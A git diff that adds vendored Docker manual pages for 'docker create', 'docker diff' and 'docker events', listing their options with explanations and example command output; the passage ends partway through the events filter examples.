diff --git a/vendor/github.com/docker/docker/man/docker-create.1.md b/vendor/github.com/docker/docker/man/docker-create.1.md
new file mode 100644
index 0000000000..3f8a076374
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-create.1.md
@@ -0,0 +1,553 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-create - Create a new container
+
+# SYNOPSIS
+**docker create**
+[**-a**|**--attach**[=*[]*]]
+[**--add-host**[=*[]*]]
+[**--blkio-weight**[=*[BLKIO-WEIGHT]*]]
+[**--blkio-weight-device**[=*[]*]]
+[**--cpu-shares**[=*0*]]
+[**--cap-add**[=*[]*]]
+[**--cap-drop**[=*[]*]]
+[**--cgroup-parent**[=*CGROUP-PATH*]]
+[**--cidfile**[=*CIDFILE*]]
+[**--cpu-count**[=*0*]]
+[**--cpu-percent**[=*0*]]
+[**--cpu-period**[=*0*]]
+[**--cpu-quota**[=*0*]]
+[**--cpu-rt-period**[=*0*]]
+[**--cpu-rt-runtime**[=*0*]]
+[**--cpus**[=*0.0*]]
+[**--cpuset-cpus**[=*CPUSET-CPUS*]]
+[**--cpuset-mems**[=*CPUSET-MEMS*]]
+[**--device**[=*[]*]]
+[**--device-read-bps**[=*[]*]]
+[**--device-read-iops**[=*[]*]]
+[**--device-write-bps**[=*[]*]]
+[**--device-write-iops**[=*[]*]]
+[**--dns**[=*[]*]]
+[**--dns-search**[=*[]*]]
+[**--dns-option**[=*[]*]]
+[**-e**|**--env**[=*[]*]]
+[**--entrypoint**[=*ENTRYPOINT*]]
+[**--env-file**[=*[]*]]
+[**--expose**[=*[]*]]
+[**--group-add**[=*[]*]]
+[**-h**|**--hostname**[=*HOSTNAME*]]
+[**--help**]
+[**-i**|**--interactive**]
+[**--ip**[=*IPv4-ADDRESS*]]
+[**--ip6**[=*IPv6-ADDRESS*]]
+[**--ipc**[=*IPC*]]
+[**--isolation**[=*default*]]
+[**--kernel-memory**[=*KERNEL-MEMORY*]]
+[**-l**|**--label**[=*[]*]]
+[**--label-file**[=*[]*]]
+[**--link**[=*[]*]]
+[**--link-local-ip**[=*[]*]]
+[**--log-driver**[=*[]*]]
+[**--log-opt**[=*[]*]]
+[**-m**|**--memory**[=*MEMORY*]]
+[**--mac-address**[=*MAC-ADDRESS*]]
+[**--memory-reservation**[=*MEMORY-RESERVATION*]]
+[**--memory-swap**[=*LIMIT*]]
+[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]]
+[**--name**[=*NAME*]]
+[**--network-alias**[=*[]*]]
+[**--network**[=*"bridge"*]]
+[**--oom-kill-disable**]
+[**--oom-score-adj**[=*0*]]
+[**-P**|**--publish-all**]
+[**-p**|**--publish**[=*[]*]]
+[**--pid**[=*[PID]*]]
+[**--userns**[=*[]*]]
+[**--pids-limit**[=*PIDS_LIMIT*]]
+[**--privileged**]
+[**--read-only**]
+[**--restart**[=*RESTART*]]
+[**--rm**]
+[**--security-opt**[=*[]*]]
+[**--storage-opt**[=*[]*]]
+[**--stop-signal**[=*SIGNAL*]]
+[**--stop-timeout**[=*TIMEOUT*]]
+[**--shm-size**[=*[]*]]
+[**--sysctl**[=*[]*]]
+[**-t**|**--tty**]
+[**--tmpfs**[=*[CONTAINER-DIR[:<OPTIONS>]*]]
+[**-u**|**--user**[=*USER*]]
+[**--ulimit**[=*[]*]]
+[**--uts**[=*[]*]]
+[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]]
+[**--volume-driver**[=*DRIVER*]]
+[**--volumes-from**[=*[]*]]
+[**-w**|**--workdir**[=*WORKDIR*]]
+IMAGE [COMMAND] [ARG...]
+
+# DESCRIPTION
+
+Creates a writeable container layer over the specified image and prepares it for
+running the specified command. The container ID is then printed to STDOUT. This
+is similar to **docker run -d** except the container is never started. You can 
+then use the **docker start <container_id>** command to start the container at
+any point.
+
+The initial status of the container created with **docker create** is 'created'.
+
+# OPTIONS
+**-a**, **--attach**=[]
+   Attach to STDIN, STDOUT or STDERR.
+
+**--add-host**=[]
+   Add a custom host-to-IP mapping (host:ip)
+
+**--blkio-weight**=*0*
+   Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+
+**--blkio-weight-device**=[]
+   Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`).
+
+**--cpu-shares**=*0*
+   CPU shares (relative weight)
+
+**--cap-add**=[]
+   Add Linux capabilities
+
+**--cap-drop**=[]
+   Drop Linux capabilities
+
+**--cgroup-parent**=""
+   Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist.
+
+**--cidfile**=""
+   Write the container ID to the file
+
+**--cpu-count**=*0*
+    Limit the number of CPUs available for execution by the container.
+    
+    On Windows Server containers, this is approximated as a percentage of total CPU usage.
+
+    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
+
+**--cpu-percent**=*0*
+    Limit the percentage of CPU available for execution by a container running on a Windows daemon.
+
+    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
+
+**--cpu-period**=*0*
+    Limit the CPU CFS (Completely Fair Scheduler) period
+
+    Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify.
+
+**--cpuset-cpus**=""
+   CPUs in which to allow execution (0-3, 0,1)
+
+**--cpuset-mems**=""
+   Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+
+   If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
+then processes in your Docker container will only use memory from the first
+two memory nodes.
+
+**--cpu-quota**=*0*
+   Limit the CPU CFS (Completely Fair Scheduler) quota
+
+**--cpu-rt-period**=0
+   Limit the CPU real-time period in microseconds
+
+   Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify.
+
+**--cpu-rt-runtime**=0
+   Limit the CPU real-time runtime in microseconds
+
+   Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
+   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
+
+   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
+
+**--cpus**=0.0
+   Number of CPUs. The default is *0.0*.
+
+**--device**=[]
+   Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)
+
+**--device-read-bps**=[]
+    Limit read rate (bytes per second) from a device (e.g. --device-read-bps=/dev/sda:1mb)
+
+**--device-read-iops**=[]
+    Limit read rate (IO per second) from a device (e.g. --device-read-iops=/dev/sda:1000)
+
+**--device-write-bps**=[]
+    Limit write rate (bytes per second) to a device (e.g. --device-write-bps=/dev/sda:1mb)
+
+**--device-write-iops**=[]
+    Limit write rate (IO per second) to a device (e.g. --device-write-iops=/dev/sda:1000)
+
+**--dns**=[]
+   Set custom DNS servers
+
+**--dns-option**=[]
+   Set custom DNS options
+
+**--dns-search**=[]
+   Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)
+
+**-e**, **--env**=[]
+   Set environment variables
+
+**--entrypoint**=""
+   Overwrite the default ENTRYPOINT of the image
+
+**--env-file**=[]
+   Read in a line-delimited file of environment variables
+
+**--expose**=[]
+   Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host
+
+**--group-add**=[]
+   Add additional groups to run as
+
+**-h**, **--hostname**=""
+   Container host name
+
+**--help**
+  Print usage statement
+
+**-i**, **--interactive**=*true*|*false*
+   Keep STDIN open even if not attached. The default is *false*.
+
+**--ip**=""
+   Sets the container's interface IPv4 address (e.g. 172.23.0.9)
+
+   It can only be used in conjunction with **--network** for user-defined networks
+
+**--ip6**=""
+   Sets the container's interface IPv6 address (e.g. 2001:db8::1b99)
+
+   It can only be used in conjunction with **--network** for user-defined networks
+
+**--ipc**=""
+   Default is to create a private IPC namespace (POSIX SysV IPC) for the container
+                               'container:<name|id>': reuses another container shared memory, semaphores and message queues
+                               'host': use the host shared memory,semaphores and message queues inside the container.  Note: the host mode gives the container full access to local shared memory and is therefore considered insecure.
+
+**--isolation**="*default*"
+   Isolation specifies the type of isolation technology used by containers. Note
+that the default on Windows server is `process`, and the default on Windows client
+is `hyperv`. Linux only supports `default`.
+
+**--kernel-memory**=""
+   Kernel memory limit (format: `<number>[<unit>]`, where unit = b, k, m or g)
+
+   Constrains the kernel memory available to a container. If a limit of 0
+is specified (not using `--kernel-memory`), the container's kernel memory
+is not limited. If you specify a limit, it may be rounded up to a multiple
+of the operating system's page size and the value can be very large,
+millions of trillions.
+
+**-l**, **--label**=[]
+   Adds metadata to a container (e.g., --label=com.example.key=value)
+
+**--label-file**=[]
+   Read labels from a file. Delimit each label with an EOL.
+
+**--link**=[]
+   Add link to another container in the form of <name or id>:alias or just
+   <name or id> in which case the alias will match the name.
+
+**--link-local-ip**=[]
+   Add one or more link-local IPv4/IPv6 addresses to the container's interface
+
+**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*"
+  Logging driver for the container. Default is defined by daemon `--log-driver` flag.
+  **Warning**: the `docker logs` command works only for the `json-file` and
+  `journald` logging drivers.
+
+**--log-opt**=[]
+  Logging driver specific options.
+
+**-m**, **--memory**=""
+   Memory limit (format: <number>[<unit>], where unit = b, k, m or g)
+
+   Allows you to constrain the memory available to a container. If the host
+supports swap memory, then the **-m** memory setting can be larger than physical
+RAM. If a limit of 0 is specified (not using **-m**), the container's memory is
+not limited. The actual limit may be rounded up to a multiple of the operating
+system's page size (the value would be very large, that's millions of trillions).
+
+**--mac-address**=""
+   Container MAC address (e.g. 92:d0:c6:0a:29:33)
+
+**--memory-reservation**=""
+   Memory soft limit (format: <number>[<unit>], where unit = b, k, m or g)
+
+   After setting memory reservation, when the system detects memory contention
+or low memory, containers are forced to restrict their consumption to their
+reservation. So you should always set the value below **--memory**, otherwise the
+hard limit will take precedence. By default, memory reservation will be the same
+as memory limit.
+
+**--memory-swap**="LIMIT"
+   A limit value equal to memory plus swap. Must be used with the  **-m**
+(**--memory**) flag. The swap `LIMIT` should always be larger than **-m**
+(**--memory**) value.
+
+   The format of `LIMIT` is `<number>[<unit>]`. Unit can be `b` (bytes),
+`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a
+unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap.
+
+**--memory-swappiness**=""
+   Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+
+**--name**=""
+   Assign a name to the container
+
+**--network**="*bridge*"
+   Set the Network mode for the container
+                               'bridge': create a network stack on the default Docker bridge
+                               'none': no networking
+                               'container:<name|id>': reuse another container's network stack
+                               'host': use the Docker host network stack.  Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure.
+                               '<network-name>|<network-id>': connect to a user-defined network
+
+**--network-alias**=[]
+   Add network-scoped alias for the container
+
+**--oom-kill-disable**=*true*|*false*
+	Whether to disable OOM Killer for the container or not.
+
+**--oom-score-adj**=""
+    Tune the host's OOM preferences for containers (accepts -1000 to 1000)
+
+**-P**, **--publish-all**=*true*|*false*
+   Publish all exposed ports to random ports on the host interfaces. The default is *false*.
+
+**-p**, **--publish**=[]
+   Publish a container's port, or a range of ports, to the host
+                               format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort
+                               Both hostPort and containerPort can be specified as a range of ports. 
+                               When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. (e.g., `-p 1234-1236:1234-1236/tcp`)
+                               (use 'docker port' to see the actual mapping)
+
+**--pid**=""
+   Set the PID mode for the container
+   Default is to create a private PID namespace for the container
+                               'container:<name|id>': join another container's PID namespace
+                               'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure.
+
+**--userns**=""
+   Set the usernamespace mode for the container when `userns-remap` option is enabled.
+     **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`).
+
+**--pids-limit**=""
+   Tune the container's pids limit. Set `-1` to have unlimited pids for the container.
+
+**--privileged**=*true*|*false*
+   Give extended privileges to this container. The default is *false*.
+
+**--read-only**=*true*|*false*
+   Mount the container's root filesystem as read only.
+
+**--restart**="*no*"
+   Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
+
+**--rm**=*true*|*false*
+   Automatically remove the container when it exits. The default is *false*.
+
+**--shm-size**=""
+   Size of `/dev/shm`. The format is `<number><unit>`. `number` must be greater than `0`.
+   Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes.
+   If you omit the size entirely, the system uses `64m`.
+
+**--security-opt**=[]
+   Security Options
+
+   "label:user:USER"   : Set the label user for the container
+    "label:role:ROLE"   : Set the label role for the container
+    "label:type:TYPE"   : Set the label type for the container
+    "label:level:LEVEL" : Set the label level for the container
+    "label:disable"     : Turn off label confinement for the container
+    "no-new-privileges" : Disable container processes from gaining additional privileges
+    "seccomp:unconfined" : Turn off seccomp confinement for the container
+    "seccomp:profile.json :  White listed syscalls seccomp Json file to be used as a seccomp filter
+
+**--storage-opt**=[]
+   Storage driver options per container
+
+   $ docker create -it --storage-opt size=120G fedora /bin/bash
+
+   This (size) will allow to set the container rootfs size to 120G at creation time.
+   This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers.
+   For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size.
+   For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option.
+   Under these conditions, user can pass any size less then the backing fs size.
+  
+**--stop-signal**=*SIGTERM*
+  Signal to stop a container. Default is SIGTERM.
+
+**--stop-timeout**=*10*
+  Timeout (in seconds) to stop a container. Default is 10.
+
+**--sysctl**=SYSCTL
+  Configure namespaced kernel parameters at runtime
+
+  IPC Namespace - current sysctls allowed:
+
+  kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
+  Sysctls beginning with fs.mqueue.*
+
+  Note: if you use --ipc=host using these sysctls will not be allowed.
+
+  Network Namespace - current sysctls allowed:
+      Sysctls beginning with net.*
+
+  Note: if you use --network=host using these sysctls will not be allowed.
+
+**-t**, **--tty**=*true*|*false*
+   Allocate a pseudo-TTY. The default is *false*.
+
+**--tmpfs**=[] Create a tmpfs mount
+
+   Mount a temporary filesystem (`tmpfs`) mount into a container, for example:
+
+   $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image
+
+   This command mounts a `tmpfs` at `/tmp` within the container.  The supported mount
+options are the same as the Linux default `mount` flags. If you do not specify
+any options, the systems uses the following options:
+`rw,noexec,nosuid,nodev,size=65536k`.
+
+**-u**, **--user**=""
+   Sets the username or UID used and optionally the groupname or GID for the specified command.
+
+   The followings examples are all valid:
+   --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+   Without this argument root user will be used in the container by default.
+
+**--ulimit**=[]
+   Ulimit options
+
+**--uts**=*host*
+   Set the UTS mode for the container
+     **host**: use the host's UTS namespace inside the container.
+     Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure.
+
+**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]
+   Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker
+   bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker
+   container. If 'HOST-DIR' is omitted,  Docker automatically creates the new
+   volume on the host.  The `OPTIONS` are a comma delimited list and can be:
+
+   * [rw|ro]
+   * [z|Z]
+   * [`[r]shared`|`[r]slave`|`[r]private`]
+
+The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR`
+can be an absolute path or a `name` value. A `name` value must start with an
+alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or
+`-` (hyphen). An absolute path starts with a `/` (forward slash).
+
+If you supply a `HOST-DIR` that is an absolute path,  Docker bind-mounts to the
+path you specify. If you supply a `name`, Docker creates a named volume by that
+`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR`
+value. If you supply the `/foo` value, Docker creates a bind-mount. If you
+supply the `foo` specification, Docker creates a named volume.
+
+You can specify multiple  **-v** options to mount one or more mounts to a
+container. To use these same mounts in other containers, specify the
+**--volumes-from** option also.
+
+You can add `:ro` or `:rw` suffix to a volume to mount it  read-only or
+read-write mode, respectively. By default, the volumes are mounted read-write.
+See examples.
+
+Labeling systems like SELinux require that proper labels are placed on volume
+content mounted into a container. Without a label, the security system might
+prevent the processes running inside the container from using the content. By
+default, Docker does not change the labels set by the OS.
+
+To change a label in the container context, you can add either of two suffixes
+`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file
+objects on the shared volumes. The `z` option tells Docker that two containers
+share the volume content. As a result, Docker labels the content with a shared
+content label. Shared volume labels allow all containers to read/write content.
+The `Z` option tells Docker to label the content with a private unshared label.
+Only the current container can use a private volume.
+
+By default bind mounted volumes are `private`. That means any mounts done
+inside container will not be visible on host and vice-a-versa. One can change
+this behavior by specifying a volume mount propagation property. Making a
+volume `shared` mounts done under that volume inside container will be
+visible on host and vice-a-versa. Making a volume `slave` enables only one
+way mount propagation and that is mounts done on host under that volume
+will be visible inside container but not the other way around.
+
+To control mount propagation property of volume one can use `:[r]shared`,
+`:[r]slave` or `:[r]private` propagation flag. Propagation property can
+be specified only for bind mounted volumes and not for internal volumes or
+named volumes. For mount propagation to work source mount point (mount point
+where source dir is mounted on) has to have right propagation properties. For
+shared volumes, source mount point has to be shared. And for slave volumes,
+source mount has to be either shared or slave.
+
+Use `df <source-dir>` to figure out the source mount and then use
+`findmnt -o TARGET,PROPAGATION <source-mount-dir>` to figure out propagation
+properties of source mount. If `findmnt` utility is not available, then one
+can look at mount entry for source mount point in `/proc/self/mountinfo`. Look
+at `optional fields` and see if any propagaion properties are specified.
+`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if
+nothing is there that means mount is `private`.
+
+To change propagation properties of a mount point use `mount` command. For
+example, if one wants to bind mount source directory `/foo` one can do
+`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This
+will convert /foo into a `shared` mount point. Alternatively one can directly
+change propagation properties of source mount. Say `/` is source mount for
+`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount.
+
+> **Note**:
+> When using systemd to manage the Docker daemon's start and stop, in the systemd
+> unit file there is an option to control mount propagation for the Docker daemon
+> itself, called `MountFlags`. The value of this setting may cause Docker to not
+> see mount propagation changes made on the mount point. For example, if this value
+> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
+> a volume.
+
+
+To disable automatic copying of data from the container path to the volume, use
+the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes.
+
+**--volume-driver**=""
+   Container's volume driver. This driver creates volumes specified either from
+   a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag.
+   See **docker-volume-create(1)** for full details.
+
+**--volumes-from**=[]
+   Mount volumes from the specified container(s)
+
+**-w**, **--workdir**=""
+   Working directory inside the container
+
+# EXAMPLES
+
+## Specify isolation technology for container (--isolation)
+
+This option is useful in situations where you are running Docker containers on
+Windows. The `--isolation=<value>` option sets a container's isolation
+technology. On Linux, the only supported is the `default` option which uses
+Linux namespaces. On Microsoft Windows, you can specify these values:
+
+* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.
+* `process`: Namespace isolation only.
+* `hyperv`: Hyper-V hypervisor partition-based isolation.
+
+Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
+
+# HISTORY
+August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+September 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-diff.1.md b/vendor/github.com/docker/docker/man/docker-diff.1.md
new file mode 100644
index 0000000000..6c6c502533
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-diff.1.md
@@ -0,0 +1,49 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-diff - Inspect changes on a container's filesystem
+
+# SYNOPSIS
+**docker diff**
+[**--help**]
+CONTAINER
+
+# DESCRIPTION
+Inspect changes on a container's filesystem. You can use the full or
+shortened container ID or the container name set using
+**docker run --name** option.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+# EXAMPLES
+Inspect the changes to on a nginx container:
+
+    # docker diff 1fdfd1f54c1b
+    C /dev
+    C /dev/console
+    C /dev/core
+    C /dev/stdout
+    C /dev/fd
+    C /dev/ptmx
+    C /dev/stderr
+    C /dev/stdin
+    C /run
+    A /run/nginx.pid
+    C /var/lib/nginx/tmp
+    A /var/lib/nginx/tmp/client_body
+    A /var/lib/nginx/tmp/fastcgi
+    A /var/lib/nginx/tmp/proxy
+    A /var/lib/nginx/tmp/scgi
+    A /var/lib/nginx/tmp/uwsgi
+    C /var/log/nginx
+    A /var/log/nginx/access.log
+    A /var/log/nginx/error.log
+
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-events.1.md b/vendor/github.com/docker/docker/man/docker-events.1.md
new file mode 100644
index 0000000000..51b042775a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-events.1.md
@@ -0,0 +1,180 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-events - Get real time events from the server
+
+# SYNOPSIS
+**docker events**
+[**--help**]
+[**-f**|**--filter**[=*[]*]]
+[**--since**[=*SINCE*]]
+[**--until**[=*UNTIL*]]
+[**--format**[=*FORMAT*]]
+
+
+# DESCRIPTION
+Get event information from the Docker daemon. Information can include historical
+information and real-time information.
+
+Docker containers will report the following events:
+
+    attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
+
+Docker images report the following events:
+
+    delete, import, load, pull, push, save, tag, untag
+
+Docker volumes report the following events:
+
+    create, mount, unmount, destroy
+
+Docker networks report the following events:
+
+    create, connect, disconnect, destroy
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-f**, **--filter**=[]
+   Filter output based on these conditions
+   - container (`container=<name or id>`)
+   - event (`event=<event action>`)
+   - image (`image=<tag or id>`)
+   - plugin (experimental) (`plugin=<name or id>`)
+   - label (`label=<key>` or `label=<key>=<value>`)
+   - type (`type=<container or image or volume or network or daemon>`)
+   - volume (`volume=<name or id>`)
+   - network (`network=<name or id>`)
+   - daemon (`daemon=<name or id>`)
+
+**--since**=""
+   Show all events created since timestamp
+
+**--until**=""
+   Stream events until this timestamp
+
+**--format**=""
+   Format the output using the given Go template
+
+The `--since` and `--until` parameters can be Unix timestamps, date formatted
+timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed
+relative to the client machine's time. If you do not provide the `--since` option,
+the command returns only new and/or live events.  Supported formats for date
+formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`,
+`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
+timezone on the client will be used if you do not provide either a `Z` or a
+`+-00:00` timezone offset at the end of the timestamp.  When providing Unix
+timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
+that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
+seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
+fraction of a second no more than nine digits long.
+
+# EXAMPLES
+
+## Listening for Docker events
+
+After running docker events a container 786d698004576 is started and stopped
+(The container name has been shortened in the output below):
+
+    # docker events
+    2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) start
+    2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) die
+    2015-01-28T20:21:32.000000000-08:00 59211849bc10: (from whenry/testimage:latest) stop
+
+## Listening for events since a given date
+Again the output container IDs have been shortened for the purposes of this document:
+
+    # docker events --since '2015-01-28'
+    2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create
+    2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start
+    2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create
+    2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start
+    2015-01-28T20:25:40.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die
+    2015-01-28T20:25:42.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop
+    2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start
+    2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die
+    2015-01-28T20:25:46.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop
+
+The following example outputs all events that were generated in the last 3 minutes,
+relative to the current time on the client machine:
+
+    # docker events --since '3m'
+    2015-05-12T11:51:30.999999999Z07:00  4386fb97867d: (from ubuntu-1:14.04) die
+    2015-05-12T15:52:12.999999999Z07:00  4386fb97867d: (from ubuntu-1:14.04) stop
+    2015-05-12T15:53:45.999999999Z07:00  7805c1d35632: (from redis:2.8) die
+    2015-05-12T15:54:03.999999999Z07:00  7805c1d35632: (from redis:2.8) stop
+
+If you do not provide the --since option, the command returns only new and/or
+live events.
+
+## Format
+
+If a format (`--format`) is specified, the given template will be executed
+instead of the default format. Go's **text/template** package describes all the
+details of the format.
+
+    # docker events --filter 'type=container' --format 'Type={{.Type}}  Status={{.Status}}  ID={{.ID}}'
+    Type=container  Status=create  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=attach  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=start  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=resize  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=die  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=destroy  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+
+If a format is set to `{{json .}}`, the events are streamed as valid JSON
+Lines. For information about JSON Lines, please refer to http://jsonlines.org/ .
+
+    # docker events --format '{{json .}}'
+    {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
+    {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
+    {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e..
+    {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42..
+    {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
+
+## Filters
+
+    $ docker events --filter 'event=stop'
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'image=ubuntu-1:14.04'
+    2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+
+    $ docker events --filter 'container=7805c1d35632'
+    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8)
+
+    $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d'
+    2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'container=7805c1d35632' --filter 'event=stop'
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'type=volume'
+    2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local)
+    2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate)
+    2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local)
+    2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local)
+
+    $ docker events --filter 'type=network'
+    2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge)
+    2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge)
+
+    $ docker events --filter 'type=plugin' (experimental)
